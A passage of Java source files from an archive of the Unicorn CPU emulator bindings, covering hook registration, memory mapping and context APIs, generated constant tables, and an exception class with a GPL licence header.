UnicornException { _mem_write(nativePtr, address, bytes); } /** * Query the internal status of the engine. * * @param type query type, one of the {@code UC_QUERY_*} constants. * @return result of the query * @see UnicornConst */ public long query(int type) throws UnicornException { return _query(nativePtr, type); } /** * Report the last error number when some API functions fail. * {@code errno} may not retain its old value once accessed. * * @return Error code, one of the {@code UC_ERR_*} constants. * @deprecated Not actually useful in Java; error numbers are always * converted into {@link UnicornException} exceptions. * @see UnicornConst */ @Deprecated public int errno() { return _errno(nativePtr); } /** * Return a string describing the given error code. * * @param code Error code, one of the {@code UC_ERR_*} constants. * @return a String that describes the error code * @see UnicornConst */ public static String strerror(int code) { return _strerror(code); } /** * Get the current emulation mode. * * @return a bitwise OR of {@code UC_MODE_*} constants. */ public int ctl_get_mode() throws UnicornException { return _ctl_get_mode(nativePtr); } /** * Get the current emulation architecture. * * @return a {@code UC_ARCH_*} constant. */ public int ctl_get_arch() throws UnicornException { return _ctl_get_arch(nativePtr); } /** Get the current execution timeout, in nanoseconds. */ public long ctl_get_timeout() throws UnicornException { return _ctl_get_timeout(nativePtr); } /** Get the current page size, in bytes. */ public int ctl_get_page_size() throws UnicornException { return _ctl_get_page_size(nativePtr); } /** Set the current page size, in bytes. * * @param page_size Requested page type. Must be a power of two. * @throws UnicornException if the architecture does not support setting * the page size. */ public void ctl_set_page_size(int page_size) throws UnicornException { _ctl_set_page_size(nativePtr, page_size); } /** Enable or disable multiple exit support. * * Exits provide a more flexible way to terminate execution, versus using * the {@code until} parameter to {@link #emu_start}. When exits are * enabled, execution will stop at any of the configured exit addresses, * and the {@code until} parameter will be ignored. */ public void ctl_exits_enabled(boolean value) throws UnicornException { _ctl_set_use_exits(nativePtr, value); } /** Get the current number of active exits. * * @return The number of exit addresses currently configured * @throws UnicornException if exits are not enabled */ public long ctl_get_exits_cnt() throws UnicornException { return _ctl_get_exits_cnt(nativePtr); } /** Get the current active exits. * * @return An array of active exit addresses. * @throws UnicornException if exits are not enabled */ public long[] ctl_get_exits() throws UnicornException { return _ctl_get_exits(nativePtr); } /** Set the active exit addresses. * * @param exits An array of exit addresses to use. * @throws UnicornException if exits are not enabled */ public void ctl_set_exits(long[] exits) throws UnicornException { _ctl_set_exits(nativePtr, exits); } /** Get the emulated CPU model. * * @return One of the {@code UC_CPU__*} constants. See the * appropriate Const class for a list of valid constants. */ public int ctl_get_cpu_model() throws UnicornException { return _ctl_get_cpu_model(nativePtr); } /** Set the emulated CPU model. Note that this option can only be called * immediately after constructing the Unicorn object, before any other APIs * are called. * * @param cpu_model One of the {@code UC_CPU__*} constants. See the * appropriate Const class for a list of valid constants. */ public void ctl_set_cpu_model(int cpu_model) throws UnicornException { _ctl_set_cpu_model(nativePtr, cpu_model); } /** Request the TB cache at a specific address. */ public TranslationBlock ctl_request_cache(long address) throws UnicornException { return _ctl_request_cache(nativePtr, address); } /** Invalidate the TB cache for a specific range of addresses * {@code [address, end)}. Note that invalidation will not include address * {@code end} itself. * * @param address The first address in the region to invalidate * @param end The last address in the region to invalidate, plus one */ public void ctl_remove_cache(long address, long end) throws UnicornException { _ctl_remove_cache(nativePtr, address, end); } /** Flush the entire TB cache, invalidating all translation blocks. */ public void ctl_flush_tb() throws UnicornException { _ctl_flush_tb(nativePtr); } /** Flush the TLB cache, invalidating all TLB cache entries and * translation blocks. */ public void ctl_flush_tlb() throws UnicornException { _ctl_flush_tlb(nativePtr); } /** Change the TLB implementation. * * @param mode One of the {@code UC_TLB_*} constants. * @see UnicornConst */ public void ctl_tlb_mode(int mode) throws UnicornException { _ctl_tlb_mode(nativePtr, mode); } private long registerHook(Hook hook, long val) { HookWrapper wrapper = new HookWrapper(); wrapper.hook = hook; wrapper.nativePtr = val; long index = nextAllocCounter(); hooks.put(index, wrapper); return index; } /** * Register a {@code UC_HOOK_INTR} hook. The hook function will be invoked * whenever a CPU interrupt occurs. * * @param callback Implementation of a {@link InterruptHook} interface * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(InterruptHook callback, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_INTR, callback, user_data, 1, 0)); } /** * Register a {@code UC_HOOK_INSN} hook. The hook function will be * invoked whenever the matching special instruction is executed. * The exact interface called will depend on the instruction being hooked. * * @param callback Implementation of an {@link InstructionHook} sub-interface * @param insn {@code UC__INS_} constant, e.g. * {@code UC_X86_INS_IN} or {@code UC_ARM64_INS_MRS} * @param begin Start address of hooking range * @param end End address of hooking range * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(InstructionHook callback, int insn, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_INSN, callback, user_data, begin, end, insn)); } /** * Register a {@code UC_HOOK_INSN} hook for all program addresses. * The exact interface called will depend on the instruction being hooked. * * @param callback Implementation of an {@link InstructionHook} * sub-interface * @param insn {@code UC__INS_} constant, e.g. * {@code UC_X86_INS_IN} or {@code UC_ARM64_INS_MRS} * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(InstructionHook callback, int insn, Object user_data) throws UnicornException { return hook_add(callback, insn, 1, 0, user_data); } /** * Register a hook for the X86 IN instruction. * The registered callback will be called whenever an IN instruction * is executed. * * @param callback Object implementing the {@link InHook} interface * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(InHook callback, Object user_data) throws UnicornException { return hook_add(callback, UC_X86_INS_IN, user_data); } /** * Register a hook for the X86 OUT instruction. * The registered callback will be called whenever an OUT instruction * is executed. * * @param callback Object implementing the {@link InHook} interface * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(OutHook callback, Object user_data) throws UnicornException { return hook_add(callback, UC_X86_INS_OUT, user_data); } /** @deprecated Use {@code hook_add(callback, UC_X86_INS_SYSCALL, begin, * end, user_data)} or {@code hook_add(callback, * UC_X86_INS_SYSENTER, begin, end, user_data)} instead. */ @Deprecated public long hook_add(SyscallHook callback, Object user_data) throws UnicornException { // Old implementation only registered SYSCALL, not SYSENTER. // Since this is deprecated anyway, we retain the old behaviour. return hook_add(callback, UC_X86_INS_SYSCALL, user_data); } /** * Register a {@code UC_HOOK_CODE} hook. The hook function will be * invoked when an instruction is executed from the address range * begin <= PC <= end. For the special case in which begin > end, the * callback will be invoked for ALL instructions. * * @param callback Implementation of a {@link CodeHook} interface * @param begin Start address of hooking range * @param end End address of hooking range * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(CodeHook callback, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_CODE, callback, user_data, begin, end)); } /** * Register a {@code UC_HOOK_BLOCK} hook. The hook function will be * invoked when a basic block is entered and the address of the basic * block (BB) falls in the range begin <= BB <= end. For the special case * in which begin > end, the callback will be invoked whenver any basic * block is entered. * * @param callback Implementation of a {@link BlockHook} interface * @param begin Start address of hooking range * @param end End address of hooking range * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(BlockHook callback, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_BLOCK, callback, user_data, begin, end)); } /** * Register a {@code UC_HOOK_MEM_VALID} hook * ({@code UC_HOOK_MEM_[READ,WRITE,FETCH]} and/or * {@code UC_HOOK_MEM_READ_AFTER}. The registered callback function will * be invoked whenever a corresponding memory operation is performed * within the address range begin <= addr <= end. For the special case in * which begin > end, the callback will be invoked for ALL memory * operations. * * @param callback Implementation of a {@link MemHook} interface * @param type Bitwise OR of {@code UC_HOOK_MEM_*} constants for * valid memory events * @param begin Start address of memory range * @param end End address of memory range * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(MemHook callback, int type, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, type, callback, user_data, begin, end)); } /** * Register a {@code UC_HOOK_MEM_*_UNMAPPED} and/or * {@code UC_HOOK_MEM_*_PROT} hook. * The hook function will be invoked whenever a memory operation is * attempted from an invalid or protected memory address within the address * range begin <= addr <= end. For the special case in which begin > end, * the callback will be invoked for ALL invalid memory operations. * * @param callback Implementation of a {@link EventMemHook} interface * @param type Bitwise OR of {@code UC_HOOK_MEM_*} constants for * invalid memory events. * @param begin Start address of memory range * @param end End address of memory range * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(EventMemHook callback, int type, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, type, callback, user_data, begin, end)); } /** * Register a {@code UC_HOOK_MEM_*_UNMAPPED} and/or * {@code UC_HOOK_MEM_*_PROT} hook for all memory addresses. * * @param callback Implementation of a {@link EventMemHook} interface * @param type Bitwise OR of {@code UC_HOOK_MEM_*} constants for * invalid memory events. * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(EventMemHook callback, int type, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, type, callback, user_data, 1, 0)); } /** * Register a {@code UC_HOOK_INSN_INVALID} hook. The hook function will be * invoked whenever an invalid instruction is encountered. * * @param callback Implementation of a {@link InvalidInstructionHook} * interface * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(InvalidInstructionHook callback, Object user_data) { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_INSN_INVALID, callback, user_data, 1, 0)); } /** * Register a {@code UC_HOOK_EDGE_GENERATED} hook. The hook function will * be invoked whenever a jump is made to a new (untranslated) basic block * with a start address in the range of begin <= pc <= end. For the * special case in which begin > end, the callback will be invoked for ALL * new edges. * * @param callback Implementation of a {@link EdgeGeneratedHook} interface * @param begin Start address * @param end End address * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(EdgeGeneratedHook callback, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_EDGE_GENERATED, callback, user_data, begin, end)); } /** * Register a {@code UC_HOOK_TCG_OPCODE} hook. The hook function will be * invoked whenever a matching instruction is executed within the * registered range. * * @param callback Implementation of a {@link TcgOpcodeHook} interface * @param begin Start address * @param end End address * @param opcode Opcode to hook. One of the {@code UC_TCG_OP_*} * constants. * @param flags Flags to filter opcode matches. A bitwise-OR of * {@code UC_TCG_OP_FLAG_*} constants. * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(TcgOpcodeHook callback, long begin, long end, int opcode, int flags, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_TCG_OPCODE, callback, user_data, begin, end, opcode, flags)); } /** * Register a {@code UC_HOOK_TLB_FILL} hook. The hook function will be * invoked to map a virtual address within the registered range to a * physical address. These hooks will only be called if the TLB mode (set * via {@link #ctl_tlb_mode}) is set to {@code UC_TLB_VIRTUAL}. * * @param callback Implementation of a {@link TlbFillHook} interface * @param begin Start address * @param end End address * @param user_data User data to be passed to the callback function each * time the event is triggered * @return A value that can be passed to {@link #hook_del} to unregister * this hook */ public long hook_add(TlbFillHook callback, long begin, long end, Object user_data) throws UnicornException { return registerHook(callback, _hook_add(nativePtr, UC_HOOK_TLB_FILL, callback, user_data, begin, end)); } /** Remove a hook that was previously registered. * * @param hook The return value from any {@code hook_add} function. */ public void hook_del(long hook) throws UnicornException { if (hooks.containsKey(hook)) { HookWrapper wrapper = hooks.remove(hook); _hook_del(nativePtr, wrapper.nativePtr); } else { throw new UnicornException("Hook is not registered!"); } } /** Remove all registrations for a given {@link Hook} object. * * @param hook A {@link Hook} object to unregister. */ public void hook_del(Hook hook) throws UnicornException { if (hook == null) { // we use null for "special" hooks that can't be _hook_del'd throw new NullPointerException("hook must not be null"); } Iterator> it = hooks.entrySet().iterator(); while (it.hasNext()) { HookWrapper wrapper = it.next().getValue(); if (wrapper.hook == hook) { it.remove(); _hook_del(nativePtr, wrapper.nativePtr); } } } /** * Create a memory-mapped I/O range. * * @param address Starting memory address of the MMIO area * @param size Size of the MMIO area * @param read_cb Implementation of {@link MmioReadHandler} to handle * read operations, or {@code null} for non-readable * memory * @param user_data_read User data to be passed to the read callback * @param write_cb Implementation of {@link MmioWriteHandler} to handle * write operations, or {@code null} for non-writable * memory * @param user_data_write User data to be passed to the write callback * @throws UnicornException */ public void mmio_map(long address, long size, MmioReadHandler read_cb, Object user_data_read, MmioWriteHandler write_cb, Object user_data_write) throws UnicornException { /* TODO: Watch mem_unmap to know when it's safe to release the hook. */ long[] hooks = _mmio_map(nativePtr, address, size, read_cb, user_data_read, write_cb, user_data_write); for (long hook : hooks) { registerHook(null, hook); } } /** * Map a range of memory, automatically allocating backing host memory. * * @param address Base address of the memory range * @param size Size of the memory block * @param perms Permissions on the memory block. A bitwise combination * of {@code UC_PROT_*} constants. */ public void mem_map(long address, long size, int perms) throws UnicornException { _mem_map(nativePtr, address, size, perms); } /** * Map a range of memory, backed by an existing region of host memory. * This API enables direct access to emulator memory without going through * {@link #mem_read} and {@link #mem_write}. *

* Usage note: The mapped memory region will correspond to the entire * passed-in Buffer from position 0 (the origin) up to its capacity. The * capacity MUST be a multiple of the page size. The current position and * limit will be ignored. * You can use {@link Buffer#slice()} to get a new Buffer sharing the same * memory region, with the origin set to the current {@code position} and * the capacity set to {@code limit - position}. * * @param address Base address of the memory range * @param buf Direct Buffer referencing the memory to map into the * emulator. IMPORTANT: You are responsible for ensuring * that this Buffer remains alive as long as the memory * remains mapped! * @param perms Permissions on the memory block. A bitwise combination * of {@code UC_PROT_*} constants. */ public void mem_map_ptr(long address, Buffer buf, int perms) throws UnicornException { _mem_map_ptr(nativePtr, address, buf, perms); } /** * Unmap a range of memory. * * @param address Base address of the memory range * @param size Size of the memory block. */ public void mem_unmap(long address, long size) throws UnicornException { _mem_unmap(nativePtr, address, size); } /** * Change permissions on a range of memory. * * @param address Base address of the memory range * @param size Size of the memory block. * @param perms Permissions on the memory block. A bitwise combination * of {@code UC_PROT_*} constants. */ public void mem_protect(long address, long size, int perms) throws UnicornException { _mem_protect(nativePtr, address, size, perms); } /** * Retrieve all memory regions mapped by {@link #mem_map}, * {@link #mmio_map} and {@link #mem_map_ptr}. * NOTE: memory regions may be split by {@link #mem_unmap}. * * @return array of mapped regions. */ public MemRegion[] mem_regions() throws UnicornException { return _mem_regions(nativePtr); } /** * Save the current CPU state of the emulator. The resulting context can be * restored on any emulator with the same {@code arch} and {@code mode}. */ public Context context_save() throws UnicornException { long ptr = _context_alloc(nativePtr); Context context = new Context(); context.nativePtr = ptr; context.arch = arch; context.mode = mode; _context_save(nativePtr, ptr); return context; } /** * Update a {@link Context} object with the current CPU state of the * emulator. */ public void context_update(Context context) throws UnicornException { if (context.arch != arch || context.mode != mode) { throw new UnicornException( "Context is not compatible with this Unicorn"); } _context_save(nativePtr, context.nativePtr); } /** * Restore the current CPU context from a saved copy. */ public void context_restore(Context context) throws UnicornException { if (context.arch != arch || context.mode != mode) { throw new UnicornException( "Context is not compatible with this Unicorn"); } _context_restore(nativePtr, context.nativePtr); } /* Obsolete context implementation, for backwards compatibility only */ /** Structure to track contexts allocated using context_alloc, for * memory safety. Not used for contexts created using * {@link #context_save()}. */ private static Hashtable allocedContexts = new Hashtable<>(); /** @deprecated Use {@link #context_save()} instead. */ @Deprecated public long context_alloc() { long ptr = _context_alloc(nativePtr); Context context = new Context(); context.nativePtr = ptr; context.arch = arch; context.mode = mode; long index = nextAllocCounter(); allocedContexts.put(index, context); return index; } /** @deprecated Do not use this method. * * @param handle Value previously returned by {@link #context_alloc} */ @Deprecated public void free(long handle) { allocedContexts.remove(handle); } /** @deprecated Use {@link #context_save()} or {@link #context_update} * instead */ @Deprecated public void context_save(long context) { context_update(allocedContexts.get(context)); } /** @deprecated Use {@link #context_restore(Context)} instead */ @Deprecated public void context_restore(long context) { context_restore(allocedContexts.get(context)); } /* Native implementation */ private static native long _open(int arch, int mode) throws UnicornException; private static native void _close(long uc) throws UnicornException; private static native void _emu_start(long uc, long begin, long until, long timeout, long count) throws UnicornException; private static native void _emu_stop(long uc) throws UnicornException; private static native long _reg_read_long(long ptr, int isContext, int regid) throws UnicornException; private static native void _reg_read_bytes(long ptr, int isContext, int regid, byte[] data) throws UnicornException; private static native void _reg_write_long(long ptr, int isContext, int regid, long val) throws UnicornException; private static native void _reg_write_bytes(long ptr, int isContext, int regid, byte[] data) throws UnicornException; private static native X86_MMR _reg_read_x86_mmr(long ptr, int isContext, int regid) throws UnicornException; private static native void _reg_write_x86_mmr(long ptr, int isContext, int regid, short selector, long base, int limit, int flags) throws UnicornException; private static native long _reg_read_x86_msr(long ptr, int isContext, int rid) throws UnicornException; private static native void _reg_write_x86_msr(long ptr, int isContext, int rid, long value) throws UnicornException; private static native long _reg_read_arm_cp(long ptr, int isContext, int cp, int is64, int sec, int crn, int crm, int opc1, int opc2) throws UnicornException; private static native void _reg_write_arm_cp(long ptr, int isContext, int cp, int is64, int sec, int crn, int crm, int opc1, int opc2, long value) throws UnicornException; private static native long _reg_read_arm64_cp(long ptr, int isContext, int crn, int crm, int op0, int op1, int op2) throws UnicornException; private static native void _reg_write_arm64_cp(long ptr, int isContext, int crn, int crm, int op0, int op1, int op2, long value) throws UnicornException; private static native void _mem_read(long uc, long address, byte[] dest) throws UnicornException; private static native void _mem_write(long uc, long address, byte[] src) throws UnicornException; private static native int _version(); private static native boolean _arch_supported(int arch); private static native long _query(long uc, int type) throws UnicornException; private static native int _errno(long uc); private static native String _strerror(int code); private native long _hook_add(long uc, int type, Hook callback, Object user_data, long begin, long end) throws UnicornException; private native long _hook_add(long uc, int type, Hook callback, Object user_data, long begin, long end, int arg) throws UnicornException; private native long _hook_add(long uc, int type, Hook callback, Object user_data, long begin, long end, int arg1, int arg2) throws UnicornException; private static native void _hook_del(long uc, long hh) throws UnicornException; private static native void _hookwrapper_free(long hh) throws UnicornException; private native long[] _mmio_map(long uc, long address, long size, MmioReadHandler read_cb, Object user_data_read, MmioWriteHandler write_cb, Object user_data_write) throws UnicornException; private static native void _mem_map(long uc, long address, long size, int perms) throws UnicornException; private static native void _mem_map_ptr(long uc, long address, Buffer buf, int perms) throws UnicornException; private static native void _mem_unmap(long uc, long address, long size) throws UnicornException; private static native void _mem_protect(long uc, long address, long size, int perms) throws UnicornException; private static native MemRegion[] _mem_regions(long uc) throws UnicornException; private static native long _context_alloc(long uc) throws UnicornException; private static native void _context_free(long ctx) throws UnicornException; private static native void _context_save(long uc, long ctx) throws UnicornException; private static native void _context_restore(long uc, long ctx) throws UnicornException; private static native int _ctl_get_mode(long uc) throws UnicornException; private static native int _ctl_get_arch(long uc) throws UnicornException; private static native long _ctl_get_timeout(long uc) throws UnicornException; private static native int _ctl_get_page_size(long uc) throws UnicornException; private static native void _ctl_set_page_size(long uc, int page_size) throws UnicornException; private static native void _ctl_set_use_exits(long uc, boolean value) throws UnicornException; private static native long _ctl_get_exits_cnt(long uc) throws UnicornException; private static native long[] _ctl_get_exits(long uc) throws UnicornException; private static native void _ctl_set_exits(long uc, long[] exits) throws UnicornException; private static native int _ctl_get_cpu_model(long uc) throws UnicornException; private static native void _ctl_set_cpu_model(long uc, int cpu_model) throws UnicornException; private static native TranslationBlock _ctl_request_cache(long uc, long address) throws UnicornException; private static native void _ctl_remove_cache(long uc, long address, long end) throws UnicornException; private static native void _ctl_flush_tb(long uc) throws UnicornException; private static native void _ctl_flush_tlb(long uc) throws UnicornException; private static native void _ctl_tlb_mode(long uc, int mode) throws UnicornException; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/UnicornConst.java000066400000000000000000000160471467524106700253320ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface UnicornConst { public static final int UC_API_MAJOR = 2; public static final int UC_API_MINOR = 1; public static final int UC_API_PATCH = 0; public static final int UC_API_EXTRA = 255; public static final int UC_VERSION_MAJOR = 2; public static final int UC_VERSION_MINOR = 1; public static final int UC_VERSION_PATCH = 0; public static final int UC_VERSION_EXTRA = 255; public static final int UC_SECOND_SCALE = 1000000; public static final int UC_MILISECOND_SCALE = 1000; public static final int UC_ARCH_ARM = 1; public static final int UC_ARCH_ARM64 = 2; public static final int UC_ARCH_MIPS = 3; public static final int UC_ARCH_X86 = 4; public static final int UC_ARCH_PPC = 5; public static final int UC_ARCH_SPARC = 6; public static final int UC_ARCH_M68K = 7; public static final int UC_ARCH_RISCV = 8; public static final int UC_ARCH_S390X = 9; public static final int UC_ARCH_TRICORE = 10; public static final int UC_ARCH_MAX = 11; public static final int UC_MODE_LITTLE_ENDIAN = 0; public static final int UC_MODE_BIG_ENDIAN = 1073741824; public static final int UC_MODE_ARM = 0; public static final int UC_MODE_THUMB = 16; public static final int UC_MODE_MCLASS = 32; public static final int UC_MODE_V8 = 64; public static final int UC_MODE_ARMBE8 = 1024; public static final int UC_MODE_ARM926 = 128; public static final int UC_MODE_ARM946 = 256; public static final int UC_MODE_ARM1176 = 512; public static final int UC_MODE_MICRO = 16; public static final int UC_MODE_MIPS3 = 32; public static final int UC_MODE_MIPS32R6 = 64; public static final int UC_MODE_MIPS32 = 4; public static final int UC_MODE_MIPS64 = 8; public static final int UC_MODE_16 = 2; public static final int UC_MODE_32 = 4; public static final int UC_MODE_64 = 8; public static final int UC_MODE_PPC32 = 4; public static final int UC_MODE_PPC64 = 8; public static final int UC_MODE_QPX = 16; public static final int UC_MODE_SPARC32 = 4; public static final int UC_MODE_SPARC64 = 8; public static final int UC_MODE_V9 = 16; public static final int UC_MODE_RISCV32 = 4; public static final int UC_MODE_RISCV64 = 8; public static final int UC_ERR_OK = 0; public static final int UC_ERR_NOMEM = 1; public static final int UC_ERR_ARCH = 2; public static final int UC_ERR_HANDLE = 3; public static final int UC_ERR_MODE = 4; public static final int UC_ERR_VERSION = 5; public static final int UC_ERR_READ_UNMAPPED = 6; public static final int UC_ERR_WRITE_UNMAPPED = 7; public static final int UC_ERR_FETCH_UNMAPPED = 8; public static final int UC_ERR_HOOK = 9; public static final int UC_ERR_INSN_INVALID = 10; public static final int UC_ERR_MAP = 11; public static final int UC_ERR_WRITE_PROT = 12; public static final int UC_ERR_READ_PROT = 13; public static final int UC_ERR_FETCH_PROT = 14; public static final int UC_ERR_ARG = 15; public static final int UC_ERR_READ_UNALIGNED = 16; public static final int UC_ERR_WRITE_UNALIGNED = 17; public static final int UC_ERR_FETCH_UNALIGNED = 18; public static final int UC_ERR_HOOK_EXIST = 19; public static final int UC_ERR_RESOURCE = 20; public static final int UC_ERR_EXCEPTION = 21; public static final int UC_ERR_OVERFLOW = 22; public static final int UC_MEM_READ = 16; public static final int UC_MEM_WRITE = 17; public static final int UC_MEM_FETCH = 18; public static final int UC_MEM_READ_UNMAPPED = 19; public static final int UC_MEM_WRITE_UNMAPPED = 20; public static final int UC_MEM_FETCH_UNMAPPED = 21; public static final int UC_MEM_WRITE_PROT = 22; public static final int UC_MEM_READ_PROT = 23; public static final int UC_MEM_FETCH_PROT = 24; public static final int UC_MEM_READ_AFTER = 25; public static final int UC_TCG_OP_SUB = 0; public static final int UC_TCG_OP_FLAG_CMP = 1; public static final int UC_TCG_OP_FLAG_DIRECT = 2; public static final int UC_HOOK_INTR = 1; public static final int UC_HOOK_INSN = 2; public static final int UC_HOOK_CODE = 4; public static final int UC_HOOK_BLOCK = 8; public static final int UC_HOOK_MEM_READ_UNMAPPED = 16; public static final int UC_HOOK_MEM_WRITE_UNMAPPED = 32; public static final int UC_HOOK_MEM_FETCH_UNMAPPED = 64; public static final int UC_HOOK_MEM_READ_PROT = 128; public static final int UC_HOOK_MEM_WRITE_PROT = 256; public static final int UC_HOOK_MEM_FETCH_PROT = 512; public static final int UC_HOOK_MEM_READ = 1024; public static final int UC_HOOK_MEM_WRITE = 2048; public static final int UC_HOOK_MEM_FETCH = 4096; public static final int UC_HOOK_MEM_READ_AFTER = 8192; public static final int UC_HOOK_INSN_INVALID = 16384; public static final int UC_HOOK_EDGE_GENERATED = 32768; public static final int UC_HOOK_TCG_OPCODE = 65536; public static final int UC_HOOK_TLB_FILL = 131072; public static final int UC_HOOK_MEM_UNMAPPED = 112; public static final int UC_HOOK_MEM_PROT = 896; public static final int UC_HOOK_MEM_READ_INVALID = 144; public static final int UC_HOOK_MEM_WRITE_INVALID = 288; public static final int UC_HOOK_MEM_FETCH_INVALID = 576; public static final int UC_HOOK_MEM_INVALID = 1008; public static final int UC_HOOK_MEM_VALID = 7168; public static final int UC_QUERY_MODE = 1; public static final int UC_QUERY_PAGE_SIZE = 2; public static final int UC_QUERY_ARCH = 3; public static final int UC_QUERY_TIMEOUT = 4; public static final int UC_CTL_IO_NONE = 0; public static final int UC_CTL_IO_WRITE = 1; public static final int UC_CTL_IO_READ = 2; public static final int UC_CTL_IO_READ_WRITE = 3; public static final int UC_TLB_CPU = 0; public static final int UC_TLB_VIRTUAL = 1; public static final int UC_CTL_UC_MODE = 0; public static final int UC_CTL_UC_PAGE_SIZE = 1; public static final int UC_CTL_UC_ARCH = 2; public static final int UC_CTL_UC_TIMEOUT = 3; public static final int UC_CTL_UC_USE_EXITS = 4; public static final int UC_CTL_UC_EXITS_CNT = 5; public static final int UC_CTL_UC_EXITS = 6; public static final int UC_CTL_CPU_MODEL = 7; public static final int UC_CTL_TB_REQUEST_CACHE = 8; public static final int UC_CTL_TB_REMOVE_CACHE = 9; public static final int UC_CTL_TB_FLUSH = 10; public static final int UC_CTL_TLB_FLUSH = 11; public static final int UC_CTL_TLB_TYPE = 12; public static final int UC_CTL_TCG_BUFFER_SIZE = 13; public static final int UC_CTL_CONTEXT_MODE = 14; public static final int UC_PROT_NONE = 0; public static final int UC_PROT_READ = 1; public static final int UC_PROT_WRITE = 2; public static final int UC_PROT_EXEC = 4; public static final int UC_PROT_ALL = 7; public static final int UC_CTL_CONTEXT_CPU = 1; public static final int UC_CTL_CONTEXT_MEMORY = 2; } unicorn-2.1.1/bindings/java/src/main/java/unicorn/UnicornException.java000066400000000000000000000016141467524106700261740ustar00rootroot00000000000000/* Java bindings for the Unicorn Emulator Engine Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ package unicorn; public class UnicornException extends RuntimeException { public UnicornException() { super(); } public UnicornException(String msg) { super(msg); } } unicorn-2.1.1/bindings/java/src/main/java/unicorn/X86Const.java000066400000000000000000002516461467524106700243100ustar00rootroot00000000000000// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT package unicorn; public interface X86Const { // X86 CPU public static final int UC_CPU_X86_QEMU64 = 0; public static final int UC_CPU_X86_PHENOM = 1; public static final int UC_CPU_X86_CORE2DUO = 2; public static final int UC_CPU_X86_KVM64 = 3; public static final int UC_CPU_X86_QEMU32 = 4; public static final int UC_CPU_X86_KVM32 = 5; public static final int UC_CPU_X86_COREDUO = 6; public static final int UC_CPU_X86_486 = 7; public static final int UC_CPU_X86_PENTIUM = 8; public static final int UC_CPU_X86_PENTIUM2 = 9; public static final int UC_CPU_X86_PENTIUM3 = 10; public static final int UC_CPU_X86_ATHLON = 11; public static final int UC_CPU_X86_N270 = 12; public static final int UC_CPU_X86_CONROE = 13; public static final int UC_CPU_X86_PENRYN = 14; public static final int UC_CPU_X86_NEHALEM = 15; public static final int UC_CPU_X86_WESTMERE = 16; public static final int UC_CPU_X86_SANDYBRIDGE = 17; public static final int UC_CPU_X86_IVYBRIDGE = 18; public static final int UC_CPU_X86_HASWELL = 19; public static final int UC_CPU_X86_BROADWELL = 20; public static final int UC_CPU_X86_SKYLAKE_CLIENT = 21; public static final int UC_CPU_X86_SKYLAKE_SERVER = 22; public static final int UC_CPU_X86_CASCADELAKE_SERVER = 23; public static final int UC_CPU_X86_COOPERLAKE = 24; public static final int UC_CPU_X86_ICELAKE_CLIENT = 25; public static final int UC_CPU_X86_ICELAKE_SERVER = 26; public static final int UC_CPU_X86_DENVERTON = 27; public static final int UC_CPU_X86_SNOWRIDGE = 28; public static final int UC_CPU_X86_KNIGHTSMILL = 29; public static final int UC_CPU_X86_OPTERON_G1 = 30; public static final int UC_CPU_X86_OPTERON_G2 = 31; public static final int UC_CPU_X86_OPTERON_G3 = 32; public static final int UC_CPU_X86_OPTERON_G4 = 33; public static final int UC_CPU_X86_OPTERON_G5 = 34; public static final int UC_CPU_X86_EPYC = 35; public static final int UC_CPU_X86_DHYANA = 36; public static final int UC_CPU_X86_EPYC_ROME = 37; public static final int UC_CPU_X86_ENDING = 38; // X86 registers public static final int UC_X86_REG_INVALID = 0; public static final int UC_X86_REG_AH = 1; public static final int UC_X86_REG_AL = 2; public static final int UC_X86_REG_AX = 3; public static final int UC_X86_REG_BH = 4; public static final int UC_X86_REG_BL = 5; public static final int UC_X86_REG_BP = 6; public static final int UC_X86_REG_BPL = 7; public 